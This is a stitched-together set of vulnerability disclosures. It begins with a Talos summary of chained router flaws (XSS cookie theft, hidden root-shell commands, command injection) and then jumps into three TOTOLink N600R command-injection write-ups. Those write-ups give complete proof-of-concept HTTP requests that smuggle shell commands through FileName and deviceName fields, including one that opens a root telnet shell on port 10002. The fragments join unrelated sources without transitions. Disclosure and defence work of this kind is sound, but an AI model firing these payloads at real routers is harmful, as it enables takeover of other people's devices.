Additionally, the following SNORTⓇ rules will detect exploitation attempts against this vulnerability: 59125, 59151, 59153, 59224-59225, 59247, 59270 – 59272, 59287, 59288, 59294, 59295 and 59414. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Cisco Secure Firewall Management Center or Snort.org. 

Talos hypothesizes a scenario where the attacker would start the chain attack from a malicious link. This can be achieved through social engineering attacks, such as phishing. 

If a victim clicks the malicious link their session cookie can be exfiltrated: 

*   TALOS-2022-1469, together with TALOS-2022-1470: The webserver uses for its web pages a template language. One of the web pages that use this template language executes one parameter set internally by the webserver as JavaScript during the handling of a request. These issues are related to the possibility to provide in the request the value of this parameter, effectively allowing to execute arbitrary JavaScript with an HTTP request. This enables an attacker to execute a cross-site scripting attack (XSS). Because no HttpOnly flag is set, the attacker could exfiltrate the session cookie, exploiting the XSS. 

At this point, the attacker has either the cookie of a non-privileged user or a privileged one. In both scenarios, there are direct paths to root: 

*   TALOS-2022-1477: The router console, the binary users interact with when they SSH/telnet into the device, has a hidden command. When provided with a specific password, this command will spawn a root shell. The provided password is compared with a string that will be decrypted using AES, but because the AES key is in the library used, the encrypted password can be decrypted. 
*   TALOS-2022-1478: In the same hidden command within the router console, if a different password is provided, it will spawn a new binary. This binary is vulnerable to a command injection vulnerability, leading to the execution of OS commands as root. 
*   TALOS-2022-1481: It is also possible to upload a bulk router configuration. If the import is performed with this method, no check on the configuration entries value is performed. This leads to break assumptions where these values are used and can cause buffer overflows that can lead to remote code execution. 

If the cookie exfiltrated is of a non-privileged user, and we do not consider that we can already obtain root from that level of privilege, the attacker can perform a privilege escalation to obtain the “privileged user” state: 

*   TALOS-2022-1472: The non-privileged user can upload the router configurations, change the privileged user password, and place its credential in a known state. 
*   TALOS-2022-1474: The non-privileged user can download the router configurations as a file. In it, there is the privileged user AES encrypted password, but because the AES password is contained in the library used by the device to encrypt and decrypt, the AES encrypted password can be decrypted by the attacker, that will obtain the privileged user credentials. 

The privileged user can then perform more functionalities than the non-privileged user, but it still does not have access to the Linux system of the router. From the “privileged user” state, there are several vulnerabilities that lead to root and some, in common with the “non-privileged user” state, were discussed earlier. Still, the following ones are unique for the “privileged user”: 

*   TALOS-2022-1475: Inside the router console, there is a “privileged view” only accessible using the privileged user password. In this view, there is a hidden command that is vulnerable to command injection. 
*   TALOS-2022-1476: In the same hidden command within the router console, there is a buffer overflow vulnerability that can lead to remote code execution. 

These examples show a few possible routes that these vulnerabilities could be leveraged to go from a single click to root access within the device. Once root access to the router is obtained any number of effects can be achieved including, but not limited to, injecting, dropping, or inspecting packets, DNS poisoning, or further pivoting into the network. 

Additional vulnerabilities have been identified (TALOS-2022-1468, TALOS-2022-1471, TALOS-2022-1473, TALOS-2022-1495) that are not part of a chain shown: 

*   TALOS-2022-1468: An issue that allows an attacker to upload arbitrary files. With this capability, an attacker could perform several malicious actions. For instance, for both non-privileged and privileged users, the attacker could change the file that forces the router console to spawn when connecting to telnet or SSH, specifying instead to spawn a root shell. 
*   TALOS-2022-1471: This is a file-parsing issue. The functionality exposed starts the parsing of a file that is assumed to be a standard ping output. If an attacker has the ability to control the content of this file, they could trigger a buffer overflow that can lead to remote code execution. This vulnerability is reachable only by a privileged user. 
*   TALOS-2022-1473: If a specific web page is requested, a specific router configuration is taken and used as part of an OS command. Leading to command injection vulnerability. 
*   TALOS-2022-1495: The binary that manages the firmware upgrade only checks its CRC. Is possible, for both non-privileged and privileged users, to perform a firmware update with any firmware that has a valid CRC. 

During our disclosure to the vendor a new firmware, version 3.5.37, was released, and we discovered TALOS-2022-1496, TALOS-2022-1499, TALOS-2022-1500, TALOS-2022-1501, in this new firmware. These problems are related to a new “privileged view” in the router console. The password for accessing it was hardcoded in the same way as TALOS-2022-1477. This view introduced new functionalities, although three of them contained command injection vulnerabilities. 

TALOS-2022-1496 (CVE-2022-27172) is a vulnerability in the hard-coded password on the device, while the other three vulnerabilities all exist in different functions of the router’s software.

Vulnerability Spotlight: How an attacker could chain several vulnerabilities in an industrial wireless router to gain root access 

TOTOLink N600R V5.3c.7159_B20190425 was discovered to contain a command injection vulnerability via the filename parameter in /setting/setUploadSetting.

**TOTOlink N600R V5.3c.7159\_B20190425 Command injection vulnerability****Overview**

*   Manufacturer's website information：http://www.totolink.cn
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The program passes the content obtained through the filename function to V6, then formats the matched content into V33 through the sprintf function, and then brings V33 into getcmdstr

At this time, the corresponding parameter A1 is finally brought into the Popen function, and there is a command injection vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V5.3c.7159\_B20190425
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 102
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/telnet.asp?timestamp=1647874864
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647874864:2
    Connection: close
    
    {"topicurl":"setting/setUploadSetting",
    "FileName":"test1$(ls>/tmp/10.txt;)",
    "ContentLength":"1"
    }
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28913: IOT_vuln/TOTOLink/N600R/10 at main · EPhaha/IOT_vuln

TOTOLink N600R V5.3c.7159_B20190425 was discovered to contain a command injection vulnerability via the filename parameter in /setting/CloudACMunualUpdate.

**TOTOlink N600R V5.3c.7159\_B20190425 Command injection vulnerability****Overview**

*   Manufacturer's website information：http://www.totolink.cn
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The program passes the contents obtained by the filename parameter to V8, then copies V8 into the stack of V15 through the strcpy function, and then brings V15 into update\_ In FW function

At this time, the corresponding parameter is A2

Function A2 formats the matched content into the stack of V11 through the sprintf function, and then brings V11 into the cstesystem function

At this time, corresponding to the parameter A1, the function assigns A1 to the array of V9, and finally executes the command through the execv function. There is a command injection vulnerability

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V5.3c.7159\_B20190425
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 86
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/telnet.asp?timestamp=1647874864
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647874864:2
    Connection: close
    
    {
    	"topicurl":"setting/CloudACMunualUpdate",
    	"FileName":"test$(ls > /tmp/9.txt)"
    }
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28911: IOT_vuln/TOTOLink/N600R/7 at main · EPhaha/IOT_vuln

TOTOLink N600R V5.3c.7159_B20190425 was discovered to contain a command injection vulnerability via the devicename parameter in /setting/setDeviceName.

**TOTOlink N600R V5.3c.7159\_B20190425 Command injection vulnerability****Overview**

*   Manufacturer's website information：http://www.totolink.cn
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The program passes the content obtained through the devicename parameter to V7, then passes the matching content to v18 through the sprintf function, and finally executes the content in v18 through the system function. There is a command injection vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V5.3c.7159\_B20190425
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 145
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/telnet.asp?timestamp=1647874864
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647874864:2
    Connection: close
    
    {
    	"topicurl":"setting/setDeviceName",
    	"file_exist":"1",
    	"num":"1",
    	"deviceMac":"1",
    	"deviceName":"';telnetd -l /bin/sh -p 10002;'“
    }
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

Tag

#telnet